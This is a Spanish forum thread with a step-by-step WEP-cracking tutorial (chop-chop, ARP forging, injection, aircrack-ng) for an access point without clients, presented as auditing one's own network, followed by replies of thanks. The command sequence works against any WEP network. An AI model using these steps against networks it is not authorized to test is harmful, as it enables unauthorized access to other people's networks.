Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
22-03-2010, 07:41:41 (Lunes)
Inicio Ayuda Reglas Ingresar Registrarse
Noticias: El Mercadillo de CiudadWireless

 
Portes gratis para usuarios del foro en www.ciudadwireless.com
+  Seguridad Wireless - Wifi
|-+  Suite Seguridad Wireless
| |-+  Manuales de Wifislax & Wifiway
| | |-+  Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Ir Abajo Imprimir
Autor Tema: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes  (Leído 15521 veces)
manel
****
Desconectado Desconectado

Mensajes: 341


« : 21-11-2008, 15:17:51 (Viernes) »

Buenas,

Lo poco que se de auditoria lo he aprendido en este foro. Si puedo quitar algo de trabajo a los que lo hacen posible , me dar茅 por satisfecho. Gracias por vuestra paciencia   Angry Angry Angry

El tuto est谩 hecho con wifiway 1.0, pero puede servir cualquier versi贸n de wifislax.
Puntualizar que el chop-chop no siempre funciona, pero al forjar nosotros el arp, la inyecci贸n es inmediata.

Al lio:

Los drivers de inyecci贸n de la bosslan/alfa ya vienen cargados.
Abrimos una consola y tecleamos:

   #iwconfig



Copiamos nuestra iface, en este caso wlan0. Vamos a cambiarle la mac:

   #macchanger -m 00:01:02:03:04:05 wlan0

El sistema responde:



Ponemos la tarjeta en modo monitor:

   #airmon-ng start wlan0

El sistema responde:



Tenemos  todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:

   #airodump-ng wlan0

Veremos una lista de los AP:



Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parar谩 el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).

Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opci贸n -b (filtrar por BSSID) y la opci贸n -w para que nos cree un archivo donde se nos guardar谩n los ivs. El nombre del archivo puede ser cualquiera.

   #airodump-ng -c [n潞_canal] -b [bssid] -w [nombre_archivo] [iface]

En nuestro caso:

   #airodump-ng -c 9 -b 00:02:CF:XX:XX:XX -w captura wlan0

El sistema responde:



Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 贸 asociaci贸n falsa:

   #aireplay-ng -1 10 -a [bssid] -h [mac_nuestra_tarjeta] [iface]

Nuestro ejemplo:

   #aireplay-ng -1 10 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0

Si todo va bien, tenemos que ver esto:




Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque 4 (chopchop), para conseguir un paquete de datos WEP:

   #aireplay-ng -4 -h [mac_nuestra_tarjeta] [iface]

Sigamos con nuestro ejemplo:

   #aireplay-ng -4 -h 00:01:02:03:04:05 wlan0

Puede tardar m谩s o menos pero nos tiene que salir algo as铆:




Nos pregunta si queremos utilizar este paquete, le decimos que y.



Nos ha creado dos archivos, uno .cap y otro .xor.
Abriremos el .cap con el tcpdump para ver la ip de nuestro AP.

   #tcpdump -s 0 -n -e -r [archivo.cap]

En nuestro caso:

   #tcpdump -s 0 -n -e -r replay_dec-1117-143113.cap

Nos responde:
   


Vemos la ip del AP: 192.168.1.1 (el 520 no se lo que es), pero siempre ser谩n los cuatro primeros n煤meros.
Ahora con el packetforge vamos a forjar un arp para poder inyectarlo:

   #packetforge-ng -0 -a [bssid] -h [mac_nuestra_tarjeta] -k [ip_origen] -l [ip_destino] -y [archivo.xor] -w [nombre_arp_que_creamos]

La ip de origen puede ser cualquiera dentro del rango, la de destino tiene que ser la del AP, y -w sera el arp, ponemos cualquier nombre.En nuestro caso:

  #packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 -k 192.168.1.255 -l 192.168.1.1 -y replay_dec-1117-143113.xor -w arp



Wrote packet to: arp, ya tenemos nuestro arp.
Ahora vamos a inyectarlo con aireplay-ng -2:

  #aireplay-ng -2 -h [mac_nuestra_tarjeta] -r [archivo_arp] [iface]

Nosotros le a帽adimos la opci贸n -x 1024, para que inyecte 1024 paquetes por segundo, por defecto son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la opci贸n por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los  pocos segundos, relanzaremos el A2 a帽adiendo la opci贸n -x 300.

    #aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r arp wlan0



Le respondemos que y , y si nada ha fallado ya estamos inyectando.
Nos vamos al airodump y lo comprobamos:



Solo nos queda esperar que suban los #data y lanzar el aircrack. A diferencia del A3, aqu铆 no nos suben los arp, por tanto el ptw no nos sirve. necesitaremos m谩s #data. Sin cerrar nada, abrimos otra consola y lanzamos el aircrack:

  #aircrack [archivo_captura]-01.cap

Nosotros:

   #aircrack captura-01.cap



Suerte y paciencia...



« Última modificación: 29-04-2009, 09:34:41 (Miércoles) por ChimoC » En línea

ovni00
****
Desconectado Desconectado

Mensajes: 309


.....................


WWW
« Respuesta #1 : 21-11-2008, 15:37:59 (Viernes) »

lo unico que puedo decir es :

 Angry Angry >:(felicitaciones  gran tuto  Angry Angry Angry Angry

esta todo muy bien detallado


se agradece demasiado Angry Angry



saludos
En línea

para quien hicieron la carcel?
porque el rico nunca entra y el pobre nunca sale
venturi
*
Desconectado Desconectado

Mensajes: 43


« Respuesta #2 : 22-11-2008, 17:20:34 (Sábado) »

si se帽or , un tutorial genial , gracias! Wink
En línea
manel
****
Desconectado Desconectado

Mensajes: 341


« Respuesta #3 : 23-11-2008, 08:46:39 (Domingo) »

 Wink Wink Wink

Un saludo
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4776



« Respuesta #4 : 23-11-2008, 13:44:42 (Domingo) »

muy bueno ....solo un detalle de estos manuales graficos..que cuando caen los servers de hosting de imgenes n6 se entiende na
 Angry
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
manel
****
Desconectado Desconectado

Mensajes: 341


« Respuesta #5 : 23-11-2008, 14:51:53 (Domingo) »

Buenas:

Los he subido a picassa, espero que duren...

Un saludo
En línea

drvalium
The Kid
*****
Desconectado Desconectado

Mensajes: 10285



« Respuesta #6 : 23-11-2008, 19:58:19 (Domingo) »


buena guia Angry Angry Angry

le pongo una chincheta Wink



saludos
En línea

Si pudi茅ramos juntar dos tontos y sacar un listo este mundo ser铆a otro



Debido a mi car谩cter anti-social no respondo a ning煤n tipo de mensaje privado.
sea lo que sea no me interesa.


No compreis la Fonera v2.0n, hay pisapapeles mucho mas bonitos y baratos
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12532



WWW
« Respuesta #7 : 03-12-2008, 21:04:34 (Miércoles) »

he mandado esta guia a la seccion de manuales
En línea

Páginas: 1 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión


elHacker     designhacks     anelkaos     laUltimaEsencia

BitsDeLocos     gokteam     TuFonera     unMundoLibre

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC